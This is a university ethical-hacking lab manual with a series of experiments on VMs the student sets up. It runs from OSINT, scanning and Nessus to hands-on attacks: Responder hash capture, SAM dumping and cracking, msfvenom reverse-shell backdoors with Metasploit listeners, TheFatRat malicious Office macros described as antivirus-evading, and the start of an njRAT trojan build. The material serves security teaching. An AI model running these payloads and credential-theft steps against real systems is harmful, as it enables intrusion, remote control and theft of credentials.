LABORATORY

MANUAL
EXPERIMENTS IN Ethical Hacking

UNIVERSITY OF Engineering AND Technology

 LIST OF AUTHORS
Sr. # Name Date Modified Contributions
1 Hamza Ayunb 2024 1st version of the manual

2 Wahaj Babar 2024 1st version of the manual

 INTRODUCTION
This Lab manual consists of laboratory experiments to complement the theory course "Ethical
Hacking", offered by the KICS Department of University of Engineering and Technology. During
the first part, techniques in penetration testing using various tools and methodologies are
discussed. This includes network scanning, vulnerability assessment, and exploitation. The second
part focuses on advanced topics such as web application security, wireless network security, and
social engineering attacks.

The basic purpose of this manual is to

● Perform experiments that demonstrate the workings of security systems and vulnerabilities
as explained in the theory course.
● Introduce students to electronic tools and software used in ethical hacking practices, which
may not be fully covered in the lecture course due to time constraints.
● Familiarize students with proper laboratory procedures, including precise record-keeping,
logical troubleshooting, ethical considerations, and adherence to legal and professional
standards.

The sequence and scope of the experiments in this booklet are parallel to the material covered in
the textbook. All experiments have been tested by students and revised to improve clarity and
effectiveness. The authors welcome any comments or suggestions to enhance the style, scope, or
clarity of the experiments, as well as to ensure the ethical integrity of the content.

Hamza Ayub
Wahaj Babar
 Certified Ethical Hacking

CONTENTS
Sr. Experiment Name
No

Fundamentals
1 Setup of Hacking Lab

Network Security and Assessment

2 Network Scanning and Enumeration Techniques

3 Vulnerability Assessment and Management

4 System Hacking

5 Malware Threats

6 Password Cracking and Hash Analysis

Advanced Hacking Techniques

7 Social Engineering Attacks and Countermeasures

8 Exploiting Buffer Overflows

9 Denial of Service (DoS) Attack Simulation

10 Man-in-the-Middle (MITM) Attack Exploration

11 Exploiting SQL Injection Vulnerabilities

12 Wireless Network Packet Sniffing and Analysis

13 Intrusion Detection System (IDS) Evasion Techniques

 EXPERIMENT 1
Setup of Hacking Lab
COMPONENTS/Tools:
● At least 20 GB of disk space
● At least 1 GB of RAM (preferably 2) for i386 and amd64 architectures
● VirtualBox (or alternative virtualization software)

THEORY REFRESHER:
Before setting up the hacking lab, it's essential to understand the basics of
virtualization and its importance in ethical hacking environments. Virtualization allows us to
create virtual machines (VMs) within a single physical machine, enabling us to run multiple
operating systems simultaneously. In the context of ethical hacking, virtualization enables the
creation of isolated environments for testing various tools and techniques without affecting
the host system or network.

PROCEDURE:

● Download Kali Linux ISO Image

○ On the official Kali Linux website downloads section, you can find Kali Linux .iso
images. These images are uploaded every few months, providing the latest official
releases.
○ Navigate to the Kali Linux Downloads page and find the packages available for
download. Depending on the system you have, download the 64-Bit or 32-Bit version.
● Create Kali Linux VirtualBox Container
○ After downloading the .iso image, create a new virtual machine and import Kali as its
OS.
○ Launch VirtualBox Manager and click the New icon.
○ Name and operating system. A pop-up window for creating a new VM appears.
Specify a name and a destination folder. The Type and Version change automatically,
based on the name you provide. Make sure the information matches the package you
downloaded and click Next.

○ Memory size. Choose how much memory to allocate to the virtual machine and click
Next. The default setting for Linux is 1024 MB. However, this varies depending on
your individual needs.
○ Hard disk. The default option is to create a virtual hard disk for the new VM. Click
Create to continue. Alternatively, you can use an existing virtual hard disk file or
decide not to add one at all.
○ Hard disk file type. Stick to the default file type for the new virtual hard disk, VDI
(VirtualBox Disk Image). Click Next to continue.
○ Storage on a physical hard disk. Decide between Dynamically allocated and Fixed
size. The first choice allows the new hard disk to grow and fill up space dedicated to
it. The second, fixed size, uses the maximum capacity from the start. Click Next.
○ File location and size. Specify the name and where you want to store the virtual hard
disk. Choose the amount of file data the VM is allowed to store on the hard disk. We
advise giving it at least 8 gigabytes. Click Create to finish.
○ Now you created a new VM. The VM appears on the list in the VirtualBox Manager.
● Configure Virtual Machine Settings
○ The next step is adjusting the default virtual machine settings.
○ Select a virtual machine and click the Settings icon. Make sure you marked the
correct VM and that the right-hand side is displaying details for Kali Linux.

○ In the Kali Linux – Settings window, navigate to General > Advanced tab. Change the
Shared Clipboard and Drag’n’Drop settings to Bidirectional. This feature allows you to
copy and paste between the host and guest machine.
○ In the Kali Linux – Settings window, navigate to General > Advanced tab. Change the
Shared Clipboard and Drag’n’Drop settings to Bidirectional. This feature allows you to
copy and paste between the host and guest machine.
○ Go to System > Motherboard. Set the boot order to start from Optical, followed by
Hard Disk. Uncheck Floppy as it is unnecessary.

○ Next, move to the Processor tab in the same window. Increase the number of
processors to two (2) to enhance performance.

○ Finally, navigate to Storage settings. Add the downloaded Kali image to a storage
device under Controller: IDE. Click the disk icon to search for the image. Once
finished, close the Settings window.
 ○ Click the Start icon to begin installing Kali.

● Installing and Setting Up Kali Linux

○ After you booted the installation menu by clicking Start, a new VM VirtualBox window
appears with the Kali welcome screen.
○ Select the Graphical install option and go through the following installation steps for
setting up Kali Linux in VirtualBox.
○ Select a language. Choose the default language for the system (which will also be the
language used during the installation process).
○ Select your location. Find and select your country from the list (or choose “other”).
○ Configure the keyboard. Decide which keymap to use. In most cases, the best option
is to select American English.
○ Configure the network. First, enter a hostname for the system and click Continue.
○ Next, create a domain name (the part of your internet address after your hostname).
Domain names usually end in .com, .net, .edu, etc. Make sure you use the same
domain name on all your machines.
○ Set up users and passwords. Create a strong root password for the system
administrator account.
○ Configure the clock. Select your time zone from the available options.
○ Partition disks. Select how you would like to partition the hard disk. Unless you have a
good reason to do it manually, go for the Guided –use entire disk option.
○ Then, select which disk you want to use for partitioning. As you created a single
virtual hard disk in Step 3: Adjust VM Settings, you do not have to worry about data
loss. Select the only available option – SCSI3 (0,0,0) (sda) – 68.7 GB ATA VBOK
HARDDISK (the details after the dash vary depending on your virtualization software).
○ Next, select the scheme for partitioning. If you are a new user, go for All files in one
partition.
○ The wizard gives you an overview of the configured partitions. Continue by navigating
to Finish partitioning and write changes to disk. Click Continue and confirm with Yes.
○ The wizard starts installing Kali. While the installation bar loads, additional
configuration settings appear.
○ Configure the package manager. Select whether you want to use a network mirror
and click Continue. Enter the HTTP proxy information if you are using one. Otherwise,
leave the field blank and click Continue again.
○ Install the GRUB boot loader on a hard disk. Select Yes and Continue. Then, select a
boot loader device to ensure the newly installed system is bootable.
○ Once you receive the message Installation is complete, click Continue to reboot your
[Link] this, you have successfully installed Kali Linux on VirtualBox. After rebooting,
the Kali login appears. Type in a username (root) and password you entered in the
previous steps.
○ Finally, the interface of Kali Linux appears on your screen.
 EXPERIMENT 2
Network Scanning and Enumeration Techniques
Part (a): Footprinting and Reconnaissance
THEORY REFRESHER:
Footprinting (also known as reconnaissance) is the technique used for gathering
information about computer systems and the entities they belong to. To get this information, a
hacker might use various tools and technologies. This information is very useful to a hacker
who is trying to crack a whole [Link] helps to:
● Know Security Posture: The data gathered will help us to get an overview of
the security posture of the company such as details about the presence of a
firewall, security configurations of applications etc.
● Reduce Attack Area: Can identify a specific range of systems and
concentrate on particular targets only. This will greatly reduce the number of
systems we are focussing on.
● Identify vulnerabilities: we can build an information database containing the
vulnerabilities, threats, loopholes available in the system of the target
organization.
● Draw Network map: It helps to draw a network map of the networks in the
target organization covering topology, trusted routers, presence of server and
other information.

Part (a1): Footprinting using Maltego

Maltego is an open source in$$telligence and forensics application. It gathers

information about a target and represents it in an easily-understandable format.

COMPONENTS/Tools:
● Kali Linux virtual machine
Objectives:

● Identify IP address
● Identify Domain and Domain Name Schema
● Identify Server Side Technology
● Identify Service Oriented Architecture (SOA) information
● Identify Name Server
● Identify Mail Exchanger
● Identify Geographical Location
● Identify Entities
● Discover Email addresses and Phone numbers

PROCEDURE:

● Click on the (+) icon located at the top-left corner of the GUI (in the toolbar) to create
a new graph window (like a blank document).
● Go to the left panel and expand the Infrastructure node under Entity Palette. This list
has a bunch of useful entities such as AS, DNS Name, Domain, MX Record, etc.
● Drag the Website entity to your New Graph(1) section.
● Rename the domain name to [Link]
● Identifying the server side technology
● Right-click the entity and select All Transforms and click To Server Technologies
[BuiltWith]
● Identifying the Domain
○ Create a new graph or delete/save the previous results.
○ Right-click the Domain entity and select All Transforms -> To Domains [DNS].

● This transform will attempt to test name schemas against a domain and try to identify a
specific name schema for the domain.
● Identifying the SOA information

○ Create a new graph or delete/save the previous results.

○ Right-click the Domain entity and select All Transforms -> To DNS Name - SOA (Start of
Authority).
● Identifying the Mail Exchanger
○ Create a new graph or delete/save the previous results.
○ Right-click the Domain entity and select All Transforms -> To DNS Name - MX (mail server).

● Identifying the Name Server

○ Create a new graph or delete/save the previous results.
 ○ Right-click the Domain entity and select All Transforms -> To DNS Name - NS (name server).

● Identifying the IP Address, Location and Whois

○ Create a new graph or delete/save the previous results.

○ Right-click the Website entity and select All Transforms -> To IP address [DNS].
○ Right-click the IP entity and select All Transforms -> To Location [city, country].
○ Right-click the Website entity and select All Transforms -> To entities from whois [IBM
Watson].
 Part (a2): Recon-ng Tutorial
Recon-ng is a web-based open-source reconnaissance tool used to extract information from
a target organization and its personnel.

COMPONENTS/Tools:

● Kali Linux virtual machine

Objectives:

● How to perform network recon.

● Gather hosts related to a domain.
● Personal Information Gathering.
● Generate a report with harvested information.
● Recon-ng has a look and feel similar to the Metasploit Framework, reducing the learning
curve for leveraging the framework.

PROCEDURE:

● Open the terminal and type recon-ng

● Type help to view all commands that allow you to add/delete records to DB, query, etc.

back Exits the current context

dashboard Displays a summary of activity
db Interfaces with the workspace's database
exit Exits the framework
help Displays this menu
index Creates a module index (dev only)
keys Manages third party resource credentials
marketplace Interfaces with the module marketplace
modules Interfaces with installed modules
options Manages the current context options
pdb Starts a Python Debugger session (dev only)
script Records and executes command scripts
shell Executes shell commands
show Shows various framework items
snapshots Manages workspace snapshots
 spool Spools output to a file
workspaces Manages workspaces
Part (a3): Using Modules from Recon-ng Marketplace

Recon-ng works with independent modules, database interaction, built in convenience

functions, interactive help, and command completion, Recon-ng provides a powerful environment in
which open source web-based reconnaissance can be conducted quickly and thoroughly. To add
new modules you will use the marketplace.

PROCEDURE:

● To view the entire marketplace repo type: marketplace search

● Dealing with modules and workspaces process is very easy as shown on the example
below:
● Installing module using marketplace command: > marketplace install
recon/domains-hosts/findsubdomains
● Loading the module using modules load command: > modules load
/recon/domains-hosts/findsubdomains
● To show module options: > info
● Executing the module: > run
● To switch between modules or workspaces type: > back
● Select an existing workspace: > workspaces select W0rkspaceName
● Select an installed module: modules load path/to/module-name
Part (a4): Information Gathering using theHarvester

THEORY REFRESHER:
The Harvester is used to gather open source intelligence (OSINT) on a company or domain.
theHarvester gathers emails, subdomains, hosts, employee names, open ports and banners from
different public sources like search engines, PGP key servers and SHODAN computer
[Link] been developed in Python by Christian Martorella. It's a very helpful tool in the early
stages of penetration tests. Help to understand the customer footprint on the internet. Some
professionals also use theHarvester to review the information available to an attacker through the
internet.
Requirements:

● Kali Linux virtual machine.

Objectives:

● Demonstrate how to identify vulnerabilities and information disclosures in search engines

using theHarvester.
● Extract email, subdomain names, virtual hosts(...) from the web sites.

Procedure:

● Run theHarvester against a target

● To view all the commands option, type: theHarvester -h
● Let's perform a full harvest on this target: theHarvester -d [Link] -l 300 -b all
● On the help command you can see the meaning of these options, like -d stands for domain,
and -l for limiting the number of search results, and -b is the search engine/source.
● theHarvester may return too much information to go through, for better readability, you can
write the output to an HTML file:

theHarvester -d [Link] -l 300 -b all -f report

● The file will be exported in your home folder in Kali Machine.

● Note: If you are having trouble exporting the HTML file, keep in mind it's a huge amount of
information being collected, you can reduce the search engines/sources, instead of using
them all at once.

Part (b): Scanning and Enumeration

Part (b1): Scanning Network

THEORY REFRESHER:
Network Scanning refers to a set of procedures performed to identify hosts, ports, and
services running in a [Link] purpose of network scanning is as follows:

● Recognize available UDP and TCP network services running on the targeted hosts.
● Recognize filtering systems between the user and the targeted hosts.
● Determine the operating systems (OSs) in use by assessing IP responses.
 ● Evaluate the target host's TCP sequence number predictability to determine
sequence prediction attack and TCP spoofing.

Part (b1.1): hping3

Objectives:

● How to perform network scanning and packet crafting using hping3 commands.

Requirements:

● Kali Linux (Attacker machine)

● Windows 10 (Target machine)

PROCEDURE:

● Login to Kali Linux and launch the Terminal.

● Use hping3 -h to show all the commands. We will focus on a couple of them so don't
worry.
● Let's start!

hping3 -c 3 <Target IP address>

● Perform TCP Flooding

hping3 <Target IP address> --flood

Part (b1.1): Network Scanning using Nmap

Objectives:
● Scan a whole Subnet.
● Trace all the sent and received packets.
● Perform a slow comprehensive scan.
● Create a new profile to perform a Null Scan.
● Scan TCP and UDP ports.
● Analyze hosts details and their topology.
● Scanning Techniques:
● TCP Connect Scan
○ Xmas Scan
○ ACK Flag Scan
○ UDP Scan
○ IDLE Scan
● Avoiding Scanning Detection
Requirements:
● Windows 10 machine.
● Kali Linux machine.

PROCEDURE:
● Scan a whole Subnet
○ Open the Terminal window and type

nmap -O <IP Range>

The option -O is related to Operating System Detection.

● Trace all the Sent and Received Packets

○ Select one host that you scanned

nmap --packet-trace [Link]

● By issuing the --packet-trace command, Nmap sends some packets to the intended machine
and receives packets in response to the sent packets. It prints a summary of every packet it
sends and receives.
○ Identifying Services with TCP Null Scan

nmap -sN -T4 -A <Target IP address>

-sN: TCP Null Scan.

-T4: Timing: (4)

Aggressive mode speeds scans up by making the assumption that you are on a reasonably
fast and reliable network.
-A: Enables OS detection, version detection, script scanning, and traceroute

Part (b2): Enumeration

THEORY REFRESHER:
Enumeration is the process of extracting user names, machine names,
network resources, shares, and services from a system, and it's conducted in an
intranet environment. In this phase, the attacker creates an active connection to the
system and performs directed queries to gain more information about the target. The
gathered information is used to identify the vulnerabilities or weak points in system
security and tries to exploit in the System gaining phase.

Part (b2.1): Enumerating Services

Objectives:
 ● Scan all the machines on a given network or subnet.
● List all alive hosts.
● Determine open ports on a given node.
● Find if any port has firewall restrictions.
● Enumerate all the services running on the port along with their respective versions.

Requisites:
● Windows Server 2012 or 2016 machine.
● Kali Linux machine.
● Another version of Windows (7, 8, 10 or Server).

Procedure:
● Ping Sweep - Nmap

○ You can perform a ping sweep in Nmap by using ping scan only (-sP) on the
whole subnet.
○ The ping sweep on Nmap will scan all the nodes on the subnet and starts
displaying all the hosts that are up and running, along with their respective
MAC Addresses and device information.
○ Open a new Terminal window on your Kali Linux and type::

nmap -sP [Link]/24

● Perform Stealth Syn Scan

○ Now, choose an IP address from the results, and perform a stealth syn scan
on Nmap.

nmap -sS <Target IP Address>

● Stealth Syn Scan with Version and OS Detection

○ Version Detection collects information about the specific service running on an

open port, including the product name and version number. This information
can be critical in determining an entry point for an attack
 ○ Nmap will perform a stealth scan with version detection along with OS
detection.

nmap -sSV -O <Target IP Address> -oN [Link]

Part (b2.2): SNMP Enumeration using snmp_enum

Objectives:

● Connected devices
● Hostname and information
● Domain
● Hardware and storage information
● Software components
● Total memory

Requirements:

● Kali Linux machine (Attacker)

● Windows Server 2012 / 2016 (Victim/Target)
● Ubuntu BeeBox (Victim/Target)

Procedure:
● Test for SNMP Port Status

○ First we need to find out whether the SNMP port is open. SNMP uses port 161
by default. To check this information, we first need to run Nmap port scan.

-sU: Scans UDP port.

-p: Port scan range.

nmap -sU -p 161 <Target IP Address>

● Enumerate Community String

● The other way to do this is to use snmp-check.

snmp-check is a package built-in on Kali Linux, just open the terminal and type:

snmp-check <Target IP Address>

● Both methods enumerate the target machine information, and retrieve the same
comprehensive list displaying the System Information. These tools supports the
following enumerations:
○ Host IP
○ Hostname
○ Hardware description
○ System uptime
○ SNMP uptime
○ Domain if system is connected in Domain
○ User Accounts
○ MAC Addresses
○ Running Processes
 EXPERIMENT 3
Vulnerability Assessment and Management
COMPONENTS/Tools:
● Kali Linux machine (Attacker)
● Windows 7 (Victim/Target)

THEORY REFRESHER:
Vulnerability Scanning refers to auditing hosts, ports, and services running in a
network to assess the security posture and search for security [Link] determines the
possibility of network security attacks, evaluating the organization's systems and network for
vulnerabilities such as missings patches, unnecessary services, weak authentication, and
weak encryption. Vulnerability scanning is a critical component of any penetration testing
assignment.

Part (a): Curl

THEORY REFRESHER:
Curl is a small computer utility which is used for transferring data from various
protocols. Libs curl is a free client-side URL transfer library. It supports cookies, HTTP,
HTTP/2, FTP and Gopher etc. It also performs SSL certificate verification.

Procedure:
● To connect and fetch the data just write this command in the terminal of kali.

● Here it is showing the result of the command i.e. [Link]

● Command if the user want to send particular request by using different http method.

● Here it is showing the result of the command i.e. curl –v –X HEAD

[Link]
Part (b): Nessus Tool
THEORY REFRESHER:
Nessus is a proprietary vulnerability scanner developed by Tenable, Inc.

Requirements:

● Nessus Essentials
● Windows 10
Procedure:
● To setup your virtual machine:
○ Create a new virtual machine (Machine > New)
○ Name the machine and select your Windows 10 Pro image for the ISO Image prompt.
○ On the Unattended Guest OS Install Setup page: Create an easy to remember
username and password, nothing else on this page needs to be changed. No product
key needed.
○ On the next page, you can leave the default ram and virtual CPU count, or adjust
them to the specs of your system for better performance.
○ The same applies to the Virtual Hard Disk page. I used 50 gb. Then you’re safe to
‘next’ through until you see the finish button and you’re good to go.
○ Now, right click on your new VM and click settings. Go to the network tab and switch
where it says Attached To: to Bridged Connection and then click Okay.
○ Start up your new VM and let Windows install. Make sure when setting up windows
that you choose not to connect to the internet, it can lead to unnecessary
complications for what we’re trying to do. After starting up, open the RUN (Win + R)
and type [Link].
○ In the firewall settings, you’ll see text that says ‘Turn Windows Firewall On or Off’.
Click this and then you should turn off both the Private and Public firewall settings. (I
realize this is not best practice, but we really just want to get hands on with Nessus)
● To set up Nessus Essentials:
○ Follow the link and register an account. You should receive a ‘key’ and you should
also receive an installer.
○ Install Nessus, it will give you a local URL to access the app (save this URL
somewhere just in case). Then next through the installation steps, ensuring that you
select Nessus Essentials. Wait for it to install and you should be good to go.
● Scanning your Virtual Machine:
○ We turned off the Virtual Machines firewall so that our Nessus will be able to talk to
our virtual machine, if you were to try and ping the machine it would be unsuccessful.
If you know how to open the proper ports and would like to take the time, you can do
that as well instead of fully turning off the firewall, but for the sake of brevity, I have
chosen to turn it off. I also still ran into some issues with discovering my virtual
machine using ICMP, so I botched together a workaround that I discuss in the steps
ahead.
○ Click New Scan in the upper right hand corner and then select Basic Network Scan.
○ Give your scan a name, whatever you please, and then write in the IP address of your
 virtual machine. (You can find this by using the command line in your virtual machine
and typing ipconfig. You’re going to want to use the IPv4 address, if you didn’t know
that already…)
○ Now you’re going to want to select the Discovery setting under Basic. Click the
dropdown and select custom, and you’ll see that you’ll receive new options on the left
under Discovery. Select Host Discovery and then turn off Ping the Remote Host. Then
select save, or launch if given the option. (If you select save you’ll have to press the
little play triangle on your saved scan to start a scan)
● The first scan should take a minute, you can select it and view what it finds in real time. You
can click through these and read about the vulnerabilities and how to remediate if you need
to. Notice also that they are color coded and ranked based on severity. It even produces a
nice visualization to give you an idea of how safe / hardened your machine is.
● Now to get an even more detailed scan, we need to reconfigure the scan. Go back to the
main screen, and click the box on the left of our scan. Then select the drop down that says
More in the top right and click Configure. Now we will click the tab next to Settings that says
Credentials. This is how we will perform a credentialed scan, which should give us even
greater results on our next scan.
● Select Windows from the categories on the left, and then under the Authentication method
choose Password. Type in the username of your virtual machine and the password as well.
Click Save, and re-run the scan the same way we did before. (Now you’ll have to leave this
page after hitting scan and hit the play button next to our scan) It should look similar to the
following:

● Now that our credentialed scan is setup, what we’re going to want to do, to more easily
illustrate the steps of discovery and remediation, is to install an old outdated version of
Mozilla Firefox on the virtual machine and watch as Nessus chews you out for this fowl
indiscretion. Here were results:
● To get familiar with Nessus, try and read through the Critical > High > Medium vulnerabilities
and follow their guidance to remediate them. To solve the issues it has with Firefox you can
either uninstall it from the vm, or update it so that it's no longer susceptible. In my own
instance, I also disabled Internet Explorer, and added a few registries using regedit to remove
the WinVerifyTrust Signature vulnerability, but obviously it’s not necessary for this tutorial. It is
more so to get familiar with Nessus, and the Discovery > Remediation workflow.
● After remediation has taken place, run the scan again and you’ll see the number of Critical >
High > Medium vulnerabilities has significantly decreased. Here is a picture after only
removing the outdated Firefox:
 EXPERIMENT 4
System Hacking
THEORY REFRESHER:
System hacking is the science of testing computers and networks for vulnerabilities
and harmful plug-ins. System hacking is itself a vast subject which consists of hacking the
different software based technological systems such as laptops, desktops, etc. System
hacking is defined as the compromise of computer systems and software to gain access to
the target computer and steal or misuse their sensitive information. Here the malicious
hacker exploits the weaknesses in a computer system or network to gain unauthorized
access of its data or take illegal advantage of it.

Part (a): LLMNR/NBT-NS

THEORY REFRESHER:
Link-Local Multicast Name Resolution (LLMNR) and Netbios Name Service (NBT-NS)
are two components of Microsoft Windows machines. LLMNR was introduced in Windows
Vista and is the successor to [Link] a DNS name server request fails, Link-Local
Multicast Name Resolution(LLMNR) and Net-BIOS Name Service(NBT-NS) is used by
Windows machines as a fallback. If the DNS name still remains unresolved, the windows
performs an unauthenticated UDP broadcast to the whole network. Any masquerading
machine, claiming to be the server, then sends a response and captures the target's
credentials during the authentication process.

Objectives:

● Perform LLMNR/NBT-NS spoofing attack.

Requisites:

● Windows 10 virtual machine.

● Kali Linux virtual machine.

Procedure:

● Using Responder
 ○ Launch and login to Windows 10 machine. (Make sure to select a common
password that 'non-tech' people will use - i.e qwerty).
○ Go to Kali Linux and open the Terminal window.
○ Start Responder to listen to the network interface. (You can type responder -h

to see the options available).

responder -I eth0

○ Now go back to the Windows 10 machine and let's assume that you want to
access a shared network drive connected in your network. Launch run and
type:

\\ceh-tools

● Obtaining and Cracking the Hashes

○ On the Kali Machine, Responder starts capturing the access logs of Windows
10 machine as shown below:
 Go to /usr/share/responder/logs/ and open the last file created by responder:

● SMB-NTLMv2-SSP-[Link].txt

○ These are hashes of the logged in user collected by the responder. Now let's
crack these hashes.
○ To crack the passwords we will use JohnTheRipper.
○ Open a new Terminal window and type john and the path to the responder logs
the name of your log file (note the file name may differ from your lab
environment):

john /usr/share/responder/logs/SMB-NTLMv2-SSP-[Link].txt

The cracked passwords hashes of the Dummy user have shown in the output above.
Part (b): Cracking SAM hashes to Extract Plain Text passwords
THEORY REFRESHER:
SAM (Security Account Manager) is a database file present in Windows machines
that stores user accounts and security descriptors for users on a local computer. It stores
users' passwords in a hashed format (in LM hash and NTLM hash). Because a hash
function is one-way, this provides some measure of security for the storage of the
passwords.

Objectives:
● Use the pwdump7 tool to extract password hashes.
● Use the Ophcrack tool to crack the passwords and obtain plain text passwords.

Requisites:

● Windows 10 machine.

Procedure:

● Generate Hashes
● Before anything, we need to find the User IDs associated with the usernames for
Windows 10.
● Launch the Command prompt in Administrator mode and type:

wmic useraccount get name,sid > c:/[Link]

● This command we got the usernames and their respective UserIDs. Make a note of
each UserID for further steps.
● To gather the Password hashes, go to the pwdump7 folder and execute the .exe file.

cd C:\Users\Dummy\Desktop\pwdump7

[Link]

● To gather this information on external .txt file, type:

[Link] > c:\[Link]

● Now place the usernames before the respective UserIDs that we have gathered in
step 2 and save the file.
○ Using Ophcrack to crack the hashes
 ○ Launch the Ophcrack application.
○ Click on Load and select PWDUMP file

○ Next, you will need to download tables to perform the cracking. Select the
Vista free to download.
○ Go to the Ophcrack and click the Tables menu to load the Table.
○ On the Table Selection window, select the Vista free, and click Ok.
○ This table_vista_free is a pre-computed table for reversing cryptographic hash
functions and recovering plaintext passwords up to a certain length. The
selected table_vista_free is installed under the name Vista free, which is
represented by a green colored bullet.
○ Click Crack on the menu bar. Ophcrack begins to crack passwords. This action
will take a few minutes.

Part (c): Escalating Privileges

THEORY REFRESHER:
Privilege Escalation is the demonstration of misusing a bug, configuration
imperfection, or design oversight in a working framework or programming application to
increase lifted access to assets that are regularly shielded from an application or client.

Objectives
● Demonstrate how to escalate privileges on a victim machine by exploiting its
vulnerabilities.

Requisites:
 ● Kali Linux virtual machine.
● Windows 10 virtual machine.

Procedure:
● Create a Backdoor
○ To create the malicious executable file, type this command and put your Kali IP
address on LHOST option:
○ msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -e
x86/shikata_ga_nai -b "\x00" LHOST=[Link] -f exe > Desktop/[Link]
○ This command will create the Windows executable file named [Link] and
will be saved on the Kali desktop.

○ Share the [Link] file

○ First off, we need to set up the apache configuration and the shared folder.

Apache configuration

If you didn't have apache2 installed, run apt-get install apache2.

● Navigate to the apache2 folder, open the [Link] configuration file, and add a
new line:
vim /etc/apache2/[Link]
● Add a new line with the command: servername localhost and save the file.

● Create a new directory inside html folder:

mkdir /var/www/html/share/
● Change the mode for the share to 755:
chmod -R 755 /var/www/html/share/
● Change the ownership of that folder to www-data:
chown -R www-data:www-data /var/www/html/share/
● To see the configuration of sharing options type:
ls -la /var/www/html/ | grep share

drwxr-xr-x 2 www-data www-data 4096 Dec 18 20:52 share

● Now copy the malicious file to the shared location:
cp /root/Desktop/[Link] /var/www/html/share/
● Start the apache service to run the http server:
service apache2 start
● Perform Exploitation
○ Start the Metasploit Framework by typing:

msfconsole

● Select the multi/handler and set the payload to meterpreter/reverse_tcp:

● use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
● Set the LHOST to the Kali IP address:
● set LHOST [Link]
● Start the exploit on background:
● exploit -j -z
○ [*] Exploit running as background job 0.
○ [*] Exploit completed, but no session was created.
○ [*] Started reverse TCP handler on [Link]:4444
● Run Exploit
● Switch to the Windows 10 machine, launch the browser and type the URL:
● [Link] (Change to the IP address of your Kali).
● Click [Link] to download the backdoor file. Once the file is downloaded navigate
to the download location and open the file to execute.
● If an Open File - Security Warning window appears, click Run.

● Switch back to the Kali machine. Meterpreter session has been successfully opened,
as shown below:
○ [*] Sending stage (180291 bytes) to [Link]
○ [*] Meterpreter session 1 opened ([Link]:4444 -> [Link]:49804) at
2019-12-18 [Link] -0500
● To interact with the available sessions, you can use the command sessions or
sessions -i to list the current sessions opened. To open any session, select the ID by
issuing the command:

sessions <ID>

● Open the current Meterpreter session and type:

● Establish a Session
Part (d): Hacking Windows with Malicious Office Document
using TheFatRat
THEORY REFRESHER:
TheFatRat is an exploiting tool which compiles malware with a famous
payload, and then the compiled malware can be executed on Linux, Windows, Mac
and Android. TheFatRat Provides An Easy way to create Backdoors and Payload
which can bypass most anti-virus.

Objectives:
● How to use an office document to exploit a windows machine.

Requisites:

● Windows Server 2016/2012 virtual machine.

● Kali linux virtual machine.

Procedure:

● Set up TheFatRat
○ Go to your Kali machine and open the Terminal.
○ Navigate to the /opt/ folder.
cd /opt
○ Clone the original github repository from FatRat:
git clone [Link]
○ Change the folder permissions:
chmod -R 755 /opt/TheFatRat/
○ Go to the TheFatRat folder:
cd TheFatRat/
○ Execute the bash file ([Link]) to begin the installation:
./[Link]
○ An Updating Kali Repo xterm window will popup as shown below:
● Make a Backdoor File
○ After the installation is complete, in the Terminal, type fatrat and hit enter.
○ When FatRat launches, starts to verify the installed dependencies, you will get
multiple prompts, just type Enter to continue.
○ On the FatRat menu, choose [06] Create Fud Backdoor 1000% with
PwnWindws [Excelent] by typing 6.

○ PwnWinds menu appears as shown above, choose the [3] Create exe file with
apache + Powershell (FUD 100%) by typing 3 in the menu.
 ○ Set the LHOST IP to your Kali IP; LPORT to 4444 and the output to payload
as shown above.
○ Next, choose [3] windows/meterpreter/reverse_tcp by typing 3.

○ If everything works, fatrat will generate a [Link] file located on

/root/Fatrat_Generated/ as shown below:
○ Backdoor Saved To : /root/Fatrat_Generated/[Link]

● Make a Malicious Word File

○ Go back to the main menu by choosing [9] Back to menu.
 ○ On the main menu, choose the [07] Create Backdoor For Office with
Microsploit

● On the Microsploit menu, choose [2] The Microsoft Office Macro on Windows by
typing 2.
● The next configurations will be:
○ LHOST IP: [Your Kali IP]
○ LPORT: 4444
○ Enter the base name for output files: EvilDoc
○ Enter the message for the document body: you have been PWNED :)
○ The next prompt will ask if you want to use a custom exe to file backdoor.
Choose y for yes.
○ Specify the exactly path to your [Link] that you generated on the
beginnings of this lab: /root/Fatrat_Generated/[Link]
○ On the Payload Option, choose the [3] windows/meterpreter/reverse_tcp by
typing 3. Navigate to the output folder of FatRat to see the generated Word
file.
● Set Up a Listener
○ Open another Terminal window and launch metasploit by typing: msfconsole.
○ Select the multi/handler:
use multi/handler
○ Set the payload to meterpreter/reverse_tcp:
set payload windows/meterpreter/reverse_tcp
○ Set the LHOST to your Kali IP and LPORT to 4444:
set LHOST [Link]
set LPORT 4444
○ Type run to start the listener:
Run
● Share the Malicious Doc File
○ To share the malicious file to Windows machine, copy the Doc file to the
apache folder. Open a new Terminal window and type:
cp /root/Fatrat_Generated/[Link] /var/www/html/share/
○ Then, start the apache service:
service apache2 start
○ Open the Malicious doc
○ Switch to your Windows machine and open the browser.
○ Type the URL (based on your Kali IP):
[Link]
○ Then, download the malicious doc that you generated.
● Open the downloads folder and click the MS Word file.
○ MS Word opens the file in Protected View. Click Enable Editing as shown
below:

○ If you got the SECURITY WARNING because of the Macros, click on Enable
Content.
○ Now Switch back to the Kali, if everything works, you will find a Meterpreter
session open in the Metasploit terminal.
○ If you got the SECURITY WARNING because of the Macros, click on Enable
Content.
○ Now Switch back to the Kali, if everything works, you will find a Meterpreter
session open in the Metasploit terminal.

○ Now you can view the exploited system details and so on. Informally you can
call this action 'profit' :)
 EXPERIMENT 5
Malware Threats
THEORY REFRESHER:
Malware / Malicious Software is a type of program that contains malicious or harmful
code embedded in apparently harmless programming or data in such a way that it can take
control of a system or its operations and cause damage, such as running the file allocation
table on a hard [Link] poses a major security threat to the information security.
Malware writers explore new attack vectors to exploit vulnerabilities in information systems.

Part (a): njRAT - Remote Access Trojan

THEORY REFRESHER:
njRAT is a RAT with powerful data-stealing capabilities. In addition to loggin
keystrokes, it is capable of accessing a victim's camera, stealing credentials stored in
browsers, uploading and downloading files, performing the process and file manipulations,
and viewing the victim's desktop

Requirements:
● Windows 10 (Attacker).
● Windows 7, 8 or Server (Target).

Objectives
● Create a server using njRAT.
● Access the target machine remotely.

Procedure:
● Create an Executable Server with njRAT
○ Log in to Windows 10 and install the njRAT.
○ Launch the njRAT, the GUI appears along with a pop-up, where you need to specify
the port you want to use to interact with the target machine. Use the default port
 number 5552, and click Start.

○ Click on Builder at the lower-left corner.

